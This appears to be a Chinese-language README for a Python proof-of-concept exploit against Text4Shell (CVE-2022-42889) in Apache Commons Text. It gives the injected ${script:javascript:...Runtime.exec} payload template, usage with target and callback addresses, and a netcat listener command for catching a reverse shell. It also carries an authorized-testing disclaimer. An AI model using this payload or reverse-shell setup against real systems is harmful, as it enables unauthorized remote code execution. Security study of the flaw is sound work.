一个基于Python的定制化概念验证(PoC)利用程序,针对Text4Shell(CVE-2022-42889),这是Apache Commons Text版本< 1.10中的一个关键远程代码执行漏洞。
该利用程序针对使用启用了插值的StringSubstitutor类的Java应用程序,允许注入${script:...}表达式以执行任意系统命令。
在此PoC中,通过data查询参数演示了利用过程;但易受攻击的参数名称可能因实现而异。用户应根据目标应用程序的逻辑相应调整有效载荷和请求路径。
免责声明:此利用程序仅供教育和授权的渗透测试使用。请负责任地使用,风险自负。
这是一个针对Apache Commons Text漏洞(即Text4Shell(CVE-2022-42889))的自定义Python3利用程序。它通过不安全的插值器实现远程代码执行(RCE),当用户输入被StringSubstitutor动态评估时触发。
测试环境:
${script:...}插值的Java应用程序python3 text4shell.py <target_ip> <callback_ip> <callback_port>
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
nc -nlvp 4444
该脚本注入:
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
通过POST请求的/data参数发送反弹Shell。